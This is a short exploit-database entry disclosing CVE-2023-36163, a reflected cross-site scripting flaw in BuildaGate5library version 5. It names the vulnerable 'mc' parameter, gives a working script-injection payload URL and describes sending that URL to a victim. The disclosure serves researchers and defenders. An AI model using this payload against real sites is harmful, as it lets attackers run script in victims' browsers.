BuildaGate5library - Reflected Cross-Site Scripting (XSS)

# Exploit Title: BuildaGate5library - Reflected Cross-Site Scripting (XSS) # Date: 06/07/2023 # Exploit Author: Idan Malihi # Vendor Homepage: None # Version: 5 # Tested on: Microsoft Windows 10 Pro # CVE : CVE-2023-36163 #PoC: An attacker just needs to find the vulnerable parameter (mc=) and inject the JS code like: '><script>prompt("XSS");</script><div id="aa After that, the attacker needs to send the full URL with the JS code to the victim and inject their browser. #Payload: company_search_tree.php?mc=aaa'><script>prompt("XSS");</script><div id="aaaa


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top